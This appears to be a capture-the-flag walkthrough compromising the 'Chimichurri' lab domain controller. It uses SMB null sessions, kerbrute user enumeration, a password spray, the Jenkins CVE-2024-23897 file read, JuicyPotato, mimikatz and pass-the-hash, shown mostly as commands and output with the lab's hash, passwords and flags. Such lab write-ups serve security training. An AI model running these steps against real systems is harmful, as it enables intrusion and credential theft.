┌──(root㉿kali)-[~]
└─# fscan -h 192.168.200.4
fscan version: 1.8.4
start infoscan
192.168.200.4:88 open
192.168.200.4:139 open
192.168.200.4:135 open
192.168.200.4:445 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.200.4
[->]CHIMICHURRI
[->]192.168.200.4
[*] NetBios 192.168.200.4 [+] DC:CHIMICHURRI0\CHIMICHURRI
Completed 4/4
[*] Scan finished, elapsed: 1.070314445s
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# nmap -sC -sV 192.168.200.4
Nmap scan report for CHIMICHURRI0.local (192.168.200.4)
Host is up (0.00043s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-03 10:37:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
6969/tcp open http Jetty 10.0.11
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
MAC Address: 08:00:27:B8:51:4D (Oracle VirtualBox virtual NIC)
Service Info: Host: CHIMICHURRI; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-03T10:37:33
|_ start_date: 2024-12-03T10:04:56
|_nbstat: NetBIOS name: CHIMICHURRI, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b8:51:4d (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 5h59m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.34 seconds
The DNS domain is chimichurri.thl (NetBIOS domain CHIMICHURRI0, hostname CHIMICHURRI). Add it to /etc/hosts:
192.168.200.4 chimichurri.thl
One more thing to keep from the nmap output: clock-skew is 5h59m57s. Kerberos tolerates about 5 minutes by default, so anything that actually authenticates with Kerberos (ticket requests, the -k option in the impacket/crackmapexec family) needs the attacker clock synced to the DC first (ntpdate against 192.168.200.4, or faketime). The NTLM-based SMB and WinRM steps below don't care, and username enumeration with kerbrute still works because an AS-REQ without pre-authentication carries no timestamp for the KDC to check.
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# smbmap -u anonymous -H 192.168.200.4
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.200.4:445 Name: chimichurri.thl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
drogas READ ONLY
IPC$ READ ONLY IPC remota
NETLOGON NO ACCESS Recurso compartido del servidor de inicio de sesión
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
The null session is accepted (Status: Authenticated with no credentials) and the custom share drogas is readable. Look inside it:
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# smbclient -U '' //chimichurri.thl/drogas
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jun 27 18:20:49 2024
.. D 0 Thu Jun 27 18:20:49 2024
credenciales.txt A 95 Mon Jul 1 01:19:03 2024
7735807 blocks of size 4096. 4368462 blocks available
smb: \> get credenciales.txt
getting file \credenciales.txt of size 95 as credenciales.txt (46.4 KiloBytes/sec) (average 46.4 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# smbclient -U '' //chimichurri.thl/IPC$
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls -a
NT_STATUS_NO_SUCH_FILE listing \-a
smb: \> exit
IPC$ is the named-pipe share, not a file share, and -a is not an smbclient option (ls takes a filename mask), so the empty listing is expected. Now the file we pulled from drogas:
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# cat credenciales.txt
Todo es mejor en con el usuario hacker, en su escritorio estan sus claves de acceso como perico
The Spanish reads roughly: "Everything is better with the user hacker; his access keys are on his desktop, like perico." "Como perico" is a figure of speech (a parakeet, something sitting out in the open, so the keys are not protected), but it also pays to read it literally: it names the file on the hacker user's desktop that holds the credential.
Since the server accepts a null/guest SMB session, the next thing to try is RID cycling (crackmapexec --rid-brute): it binds to the lsarpc named pipe, looks up the domain SID, and asks LsarLookupSids for RID 500, 501, 1000, 1001, ... to turn every RID into an account name. It works with any SMB session that is allowed to bind that pipe, whether a null/guest session or one valid domain user.
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# crackmapexec smb chimichurri.thl -u 'guest ' -p ' ' --rid-brute
SMB chimichurri.thl 445 CHIMICHURRI [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB chimichurri.thl 445 CHIMICHURRI [+] chimichurri.thl\guest :
SMB chimichurri.thl 445 CHIMICHURRI [-] Error creating DCERPC connection: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
That fails. The guest session itself is accepted (the [+] line), but opening the lsarpc pipe for the DCERPC bind is denied (STATUS_ACCESS_DENIED): anonymous/guest access to named pipes has been restricted on this DC, and without that pipe there is no RID cycling. Next, see what anonymous LDAP gives us:
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# ldapsearch -x -H ldap://192.168.200.4 -s 'base' namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=chimichurri,DC=thl
namingContexts: CN=Configuration,DC=chimichurri,DC=thl
namingContexts: CN=Schema,CN=Configuration,DC=chimichurri,DC=thl
namingContexts: DC=DomainDnsZones,DC=chimichurri,DC=thl
namingContexts: DC=ForestDnsZones,DC=chimichurri,DC=thl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Nothing useful: an anonymous bind only gets the rootDSE naming contexts (which at least confirm the base DN, DC=chimichurri,DC=thl); by default AD does not let an anonymous bind read directory objects beyond that.
So we still need one valid domain user, and with RID cycling blocked for anonymous sessions the remaining option is to enumerate usernames. Kerberos does that without any credentials: kerbrute sends an AS-REQ without pre-authentication for each candidate name, and the KDC answers KDC_ERR_PREAUTH_REQUIRED for an account that exists and KDC_ERR_C_PRINCIPAL_UNKNOWN for one that doesn't. No password is tried, so this does not count against account lockout and produces no 4625 logon failures, although a DC that audits the Kerberos Authentication Service still logs 4768 events for the unknown names.
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# kerbrute userenum -d chimichurri.thl -t 100 --dc 192.168.200.4 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
Version: v1.0.3 (9dad6e1) - 12/03/24 - Ronnie Flathers @ropnop
2024/12/03 12:49:28 > Using KDC(s):
2024/12/03 12:49:28 > 192.168.200.4:88
2024/12/03 12:49:28 > [+] VALID USERNAME: hacker@chimichurri.thl
2024/12/03 12:49:28 > [+] VALID USERNAME: Hacker@chimichurri.thl
2024/12/03 12:49:33 > [+] VALID USERNAME: invitado@chimichurri.thl
2024/12/03 12:49:47 > [+] VALID USERNAME: administrador@chimichurri.thl
2024/12/03 12:49:48 > [+] VALID USERNAME: HACKER@chimichurri.thl
2024/12/03 12:54:16 > Done! Tested 8295455 usernames (5 valid) in 288.265 seconds
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# awk '{print $7}' valid_user.txt | sed 's/@.*//' >kerber_brute_users.txt
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# cat kerber_brute_users.txt
hacker
Hacker
invitado
administrador
HACKER
valid_user.txt is the kerbrute output saved to a file; field 7 of each VALID USERNAME line is the principal. Note that the five hits are only three accounts: hacker, Hacker and HACKER are the same account (AD names are case-insensitive; the wordlist simply contains all three spellings), plus invitado (the Spanish-locale Guest) and administrador (the built-in Administrator). Now try each username as its own password:
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# crackmapexec smb chimichurri.thl -u kerber_brute_users.txt -p kerber_brute_users.txt --no-bruteforce --continue-on-success
SMB chimichurri.thl 445 CHIMICHURRI [*] Windows 10 / Server 2016 Build 14393 x64 (name:CHIMICHURRI) (domain:chimichurri.thl) (signing:True) (SMBv1:False)
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\hacker:hacker STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\Hacker:Hacker STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\invitado:invitado STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\administrador:administrador STATUS_LOGON_FAILURE
SMB chimichurri.thl 445 CHIMICHURRI [-] chimichurri.thl\HACKER:HACKER STATUS_LOGON_FAILURE
No account uses its username as its password. Two things to remember about this spray: --no-bruteforce pairs line i of the user file with line i of the password file, and because the list kept the case variants it sent three failed logons to the single hacker account, which against a domain with a lockout threshold is budget burned for nothing.
Back to the nmap output: the target also exposes Jenkins on 6969:
6969/tcp open http Jetty 10.0.11
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
Jenkins has a long list of CVEs, so start with a recent one (https://www.exploit-db.com/). The one that fits is CVE-2024-23897 (Exploit-DB 51993), an arbitrary file read rather than an LFI in the web sense: the Jenkins CLI parses its arguments with args4j, which replaces an argument of the form @<path> with the contents of that file, and the command's error message echoes the unexpected argument back. Anyone who can run CLI commands (here anonymous, since the exploit below works with no credentials) can therefore read files from the controller. Fixed in Jenkins 2.442 and LTS 2.426.3.
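Added example, not code from the writeup, from Jenkins or from args4j: a small Python simulation of the root cause plus a version gate for the X-Jenkins response header. expand_at_files mirrors args4j's @file expansion; connect_node is a toy command that echoes an unknown argument the way the real CLI error does (the message text is invented, not Jenkins'); the secret file content is constructed. Check the header first (`curl -sI http://192.168.200.4:6969/login` and look at X-Jenkins) before firing 51993.py.

```python
"""CVE-2024-23897, the root cause in miniature: args4j '@file' argument expansion.

Simulation of the argument-parser behaviour, not Jenkins or args4j code.
"""
import os
import tempfile

# Constructed stand-in for the target's C:\Users\hacker\Desktop\perico.txt
SAMPLE_SECRET = "hacker:Perico69\n"


def expand_at_files(argv, at_syntax=True):
    """Mimic args4j: every argument of the form '@<path>' is replaced by the lines of
    that file, each line becoming its own argument.  Jenkins shipped this on by default
    until 2.442 / LTS 2.426.3; the fix turns it off (args4j's withAtSyntax(false))."""
    if not at_syntax:
        return list(argv)
    expanded = []
    for arg in argv:
        path = arg[1:]
        if arg.startswith("@") and os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                expanded.extend(line.rstrip("\r\n") for line in fh)
        else:
            expanded.append(arg)
    return expanded


def connect_node(argv, known_agents=("built-in",)):
    """Toy stand-in for a CLI command that validates its arguments and echoes an
    unknown one back in the error text, which is how the file contents reach anyone
    who may run CLI commands (anonymous, when Overall/Read is granted)."""
    for name in argv[1:]:
        if name not in known_agents:
            return f"ERROR: No such agent {name!r} exists."
    return "OK"


def jenkins_vulnerable(version):
    """Version gate from the X-Jenkins header: weekly < 2.442, LTS < 2.426.3."""
    parts = tuple(int(p) for p in version.split("."))
    if len(parts) == 3:          # LTS versions are x.y.z
        return parts < (2, 426, 3)
    return parts < (2, 442)


def demo(secret_text=SAMPLE_SECRET):
    """Write the constructed secret to a temp file and run the same argv through the
    vulnerable and the fixed parser.  Returns (leaked_argv, safe_argv, error_text)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret_text)
        path = fh.name
    try:
        argv = ["connect-node", "@" + path]
        leaked = expand_at_files(argv)                 # vulnerable default
        safe = expand_at_files(argv, at_syntax=False)  # patched behaviour
        return leaked, safe, connect_node(leaked)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, safe, err = demo()
    print("vulnerable:", leaked)
    print("patched:   ", safe)
    print(err)
    for v in ("2.441", "2.442", "2.426.2", "2.426.3", "2.440.1"):
        print(v, "vulnerable" if jenkins_vulnerable(v) else "fixed")
```

The patched parser hands the literal string "@/users/hacker/desktop/perico.txt" to the command, which then fails on a node name that does not exist and leaks nothing.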
Recall credenciales.txt: it said the hacker user's access keys are on his desktop "como perico", which turns out to be literal:
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# cat credenciales.txt
Todo es mejor en con el usuario hacker, en su escritorio estan sus claves de acceso como perico
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# python3 51993.py -u http://192.168.200.4:6969
Press Ctrl+C to exit
File to download:
> /users/hacker/desktop/perico.txt
hacker:Perico69
That is the hacker user's password (Java accepts forward slashes in paths on Windows, so /users/hacker/desktop/perico.txt resolves to C:\Users\hacker\Desktop\perico.txt). Try it over WinRM:
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# evil-winrm -i 192.168.200.4 -u hacker -p Perico69
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hacker\Documents>
Logged in. First, the current user's privileges (output of whoami /priv; the box runs a Spanish locale):
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio          Descripción                                   Estado
============================= ============================================ ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio      Habilitada
SeChangeNotifyPrivilege       Omitir comprobación de recorrido              Habilitada
SeImpersonatePrivilege        Suplantar a un cliente tras la autenticación  Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso  Habilitada
(Add workstations to domain, Bypass traverse checking, Impersonate a client after authentication, Increase a process working set; all Enabled.)
SeImpersonatePrivilege is enabled. It lets our process impersonate the token of any client that authenticates to it, which is exactly what the Potato family abuses to coerce SYSTEM into connecting to us. Two options: upload RunasCs, or upload a Potato. RunasCs needs another account's password, which we don't have, so it's out.
I did neither by hand and used Cobalt Strike instead: uploaded a beacon, got the callback, and ran JuicyPotato from it. The target is Server 2016 build 14393, which is still within the range JuicyPotato handles (it stops working from Windows 10 1809 / Server 2019 onward); it needs a CLSID valid for that build and a local port it can bind. That gave SYSTEM.
One more catch: even as SYSTEM the flag is not readable; it is only granted to the administrator account. Dropping from SYSTEM to an administrator is easy in CS, by process injection or token theft into an administrator-owned process. I took the direct route instead: ran mimikatz as SYSTEM, dumped the Administrador NT hash, and used it to log in over WinRM (pass-the-hash):
┌──(root㉿kali)-[/home/kali/thl/Chimichurri]
└─# evil-winrm -i 192.168.200.4 -u Administrador -H 058a4c99bab8b3d04a6bd959f95ce2b2
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrador\Documents> whoami
chimichurri0\administrador
*Evil-WinRM* PS C:\Users\Administrador\Documents> type c:\users\administrador\desktop\root.txt
hjafcdv8a75e3cvsdfg6asd4f9vbsf9sa
*Evil-WinRM* PS C:\Users\Administrador\Documents> type c:\users\hacker\desktop\user.txt
acrsgvs6edr8f5vaw9a8eadv6fa9b
Note that on a Spanish-locale Windows the built-in administrator is named Administrador, not Administrator (same RID 500 account, and the same name kerbrute returned); use that spelling for the pass-the-hash login.